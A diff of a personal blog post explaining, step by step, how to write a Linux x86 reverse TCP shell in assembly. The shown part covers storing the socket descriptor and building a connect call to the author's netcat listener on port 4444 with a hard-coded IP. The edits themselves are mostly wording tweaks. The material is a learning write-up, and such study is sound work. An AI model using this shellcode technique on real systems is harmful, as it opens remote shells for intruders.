C-Brown/C-Brown.github.io/_posts/2019-02-26-Shell-Reverse-TCP.md

 mov ecx, esp
 int 0x80
 ```
-Return value will be sockfd stored in EAX.
-Since EAX is used for our socketcall argument, we need to move it to a register for safe keeping which will be edi.
+Return value will be the sockfd which is stored in EAX.
+Since EAX is used for our socketcall argument, we need to move it to a register for safe keeping.
+I will be using edi.
 ```asm
 mov edi, eax
 ```
 ### Connect to an IP and port
-Now that we have the sockfd, it's time to connect the socket to an IP and port.\
+Now that we have the sockfd, it's time to connect the socket to an IP and port.

-\
-As we created earlier, our reference is:\
+As we created earlier, our reference is:

 int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);

-Just for my own understanding, I'll write out the socketcall format with any structs or objects in {}.\
+Just for my own understanding, I'll write out the socketcall format with any structs or objects in {}.

-socketcall( SYS_CONNECT, {sockfd, {AF_INET, 4444, [IP]}, 0x10} );\
+socketcall( SYS_CONNECT, {sockfd, {AF_INET, 4444, [IP]}, 0x10} );

-EAX - 0x66\
+EAX - 0x66 - socketcall

-EBX - 0x3\
+EBX - 0x3 -SYS_CONNECT

-ECX - pointing to stack:\
+ECX - pointing to stack:

-STACK: edi, point to struct, 0x10, struct{0x2, 0x115C, 0x83f7a8c0}\
+STACK: edi, point to struct, 0x10, struct{0x2, 0x115C, 0x83f7a8c0}

-\
+0x115C is the port number and 0x83f7a8c0 is the IP of my netcat listener.

 Lets build this in assembly now:
 ```asm
 mov al, 0x66